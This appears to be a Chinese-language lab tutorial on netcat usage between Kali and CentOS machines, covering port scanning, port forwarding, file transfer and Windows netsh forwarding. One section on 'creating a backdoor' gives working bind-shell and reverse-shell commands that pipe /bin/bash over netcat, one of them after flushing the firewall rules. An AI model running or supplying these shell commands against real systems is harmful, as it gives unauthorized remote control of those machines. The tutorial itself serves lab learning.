我安裝了kali、centos,並且kali上安裝了ncat
Kali上:apt install ncat
Centos上:yum -y install nmap-ncat
一.傳統版與現代版切換
命令:update-alternatives --config nc
/bin/nc.traditional 為傳統netcat
二.監聽入站連接
步驟一:建立一個命令文件
代碼復制到web.sh文件中:
#!/bin/bash
while true;do nc -l -p 8080 -q 1 < index.html;done
exit 0
建立一個文件index.html,里面隨便寫內容
步驟二:運行web.sh文件
步驟三:本地瀏覽器訪問8080端口
三.連接遠程系統
在上面二的基礎上
我用centos7去連接kali
四.端口掃描
步驟一:首先update-alternatives --config nc切換到傳統版本
步驟二:netstat -tpln 查看本機啟動了哪些端口
步驟三:開始掃描nc -v -w 2 -z 192.168.80.132 22-65535
-v:顯示詳細
-w:超時2s跳過
-z:主機地址
五.端口轉發
步驟一:在centos7上啟動apache,並查看端口,為80端口
步驟二:在kali上輸入命令nc -c "nc 192.168.80.131 80" -l -p 8181
意思為:創建8181端口來監聽(注意kaili8181端口不存在),
並將發往kali8181端口的數據給到centos7的80端口。
步驟三:在瀏覽器,輸入kali的ip:8181端口,訪問到了centos7啟動的apache
六.創建后門
正向連接:
centos7(服務端,公網機器)
步驟1:
Iptables -F (關閉防火牆策略)
nc -l -p 10000 -t -e /bin/bash
kali(客戶端)
步驟2:nc 192.168.80.131 10000
步驟3:輸入uname -v 就可以查看centos7的版本信息,同樣可以玩其它命令
反向連接:
Kali(客戶端)
步驟1:nc -lvp 4444
-l:監聽
-v:顯示詳情
-p:端口
centos7(服務端)
步驟2:nc -t -e /bin/bash 192.168.80.132 4444
步驟3:在kali上操作,輸入uname -a 就可以查看centos7版本信息,同樣可以玩其它命令
七.拷貝文件
步驟一:在centos7 上建立監聽端口,並將接收到的信息保存到file.txt文件
nc -l -p 6666 > file.txt
步驟二:在kali上連接centos7建立的端口,並發送index.html文件
步驟三:在centos7上查看file.txt內容
八.frp內網穿透(不易掉線、加密、專業)
九.Windows下netsh端口轉發
步驟一:以管理員模式打開cmd窗口
步驟二:建立轉發命令:netsh interface portproxy add v4tov4 listenport=8081 connectaddress=192.168.80.131 connectport=80(本地建立監聽端口8081,192.168.80.131為centos7ip,80為centos7的apache端口)
步驟三:瀏覽器訪問
